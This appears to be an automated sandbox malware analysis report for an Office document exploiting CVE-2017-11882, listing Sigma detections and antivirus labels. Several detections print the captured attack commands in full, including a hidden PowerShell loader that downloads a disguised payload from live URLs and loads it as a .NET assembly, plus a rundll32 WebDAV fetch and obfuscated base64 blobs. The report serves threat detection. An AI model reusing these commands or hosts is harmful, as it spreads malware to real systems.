gTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgT

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49166, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1668, Protocol: tcp, SourceIp: 91.92.244.96, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2096, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 91.92.244.96 http://91.92.244.96/LEO/CLO, CommandLine: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 91.92.244.96 http://91.92.244.96/LEO/CLO, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 848, ParentProcessName: WINWORD.EXE, ProcessCommandLine: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 91.92.244.96 http://91.92.244.96/LEO/CLO, ProcessId: 1668, ProcessName: rundll32.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Leoloverme.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Leoloverme.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1404, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Leoloverme.vbs" , ProcessId: 2096, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgT

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 91.92.244.96, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1404, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49160

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2096, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49160, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1404, Protocol: tcp, SourceIp: 91.92.244.96, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Leoloverme.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Leoloverme.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1404, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Leoloverme.vbs" , ProcessId: 2096, ProcessName: wscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1404, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgT

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 848, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2856, TargetFilename: C:\Users\user\AppData\Local\Temp\5dhjdumq.ytq.ps1

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Sigma detected: rundll32 run dll from internet

Source: Process started

Author: Joe Security: Data: Command: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 91.92.244.96 http://91.92.244.96/LEO/CLO, CommandLine: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 91.92.244.96 http://91.92.244.96/LEO/CLO, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 848, ParentProcessName: WINWORD.EXE, ProcessCommandLine: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 91.92.244.96 http://91.92.244.96/LEO/CLO, ProcessId: 1668, ProcessName: rundll32.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A088A985-E6D5-4349-B475-13037637E9EB}.tmp	Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8B5A84F.doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
